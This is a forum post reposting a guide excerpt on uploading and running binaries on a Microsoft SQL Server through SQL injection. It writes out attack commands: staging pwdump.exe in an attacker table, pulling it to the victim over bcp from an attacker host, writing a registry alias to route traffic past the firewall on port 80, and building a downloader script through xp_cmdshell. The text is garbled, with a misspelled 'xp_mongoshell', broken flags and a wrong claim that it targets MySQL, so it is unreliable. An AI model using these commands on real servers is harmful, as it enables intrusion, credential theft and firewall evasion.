Upload Files Via SQL Injection

I found this awesome guide on SQL Injection, and it had this really cool, but tiny, section on how to upload files via SQLi. its worth the read in my honest opinion (but I am not that good at SQLi)

NOTE: I did not make this, I just found it on google. You can find it by googleing;
Code: Manipulating Microsoft SQL Server Using SQL Injection

Anyways, here it is;
---------------------

Uploading files (via sqli)
Bytes ----------------------------------------------------------------------------------------------
=- =-
Please take note that this will only work on MySQL Windows Servers.
=- =-

Once an attacker has gained adequate privileges on the SQL Server, they will then want to upload
"Binaries" to the server. Since this can not be done using protocols such as SMB, since port 137-139
Typically is blocked at the firewall, the attacker will need another method of getting the binaries onto
Victim's file system.

This can be done by uploading a binary file into a table local to the attacker and then
Pulling the data to the victim's file system using a SQL Server connection.
To accomplish this the attacker wocould create a table on the local server as follows.

Code: create table AttackerTable (data text)

Having created the table to hold the binary, the attacker wocould then upload the binary into the table
Follows:

Code: bulk insert AttackerTable
From pwdump.exe
With (codepage = RAW)

The binary can then be downloaded to the victim server from the attacker's server by running
Following SQL statement on the victim server:

Code: exec xp_mongoshell bcp "select * from AttackerTable" queryout pwdump.exe-c-
Craw-Shackersip-Usa-Ph8ck3r

This statement will be issue an outbound connection to the attacker's server and write the results of the query
Into a file recreating the executable. In this case, the connection will be made using the default protocol
And port which cocould likely be blocked by the firewall. To circumvent the firewall, the attacker cocould try:

Code: exec xp_regwrite
HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftMSSQLServerClientConnectTo, Hacke
RSrvAlias, REG_SZ, DBMSSOCN, hackersip, 80

And then:
Code: exec xp_mongoshell bcp "select * from AttackerTable" queryout pwdump.exe-c-
Craw-SHackerSrvAlias-Usa-Ph8ck3r

The first SQL statement will configure a connection to the hacker's server over port 80 while the second
SQL statement will connect to the hacker's server using port 80 and download the binary file.
Another method a hacker cocould use wocould be to write Visual Basic Script (. vbs) or Java Script files (. js)
To the OS file system and then execute those scripts. Using this technique the scripts wowould connect to any
Server and download the attacker's binary files or even copy over the script and execute it in the victim
Server.

Code: exec xp_cmdshell "first script line"> script. vbs
Exec xp_cmdshell "second script line"> script. vbs
...
Exec xp_cmdshell "last script line"> script. vbs
Exec xp_cmdshell script. vbs --> execute script to download binary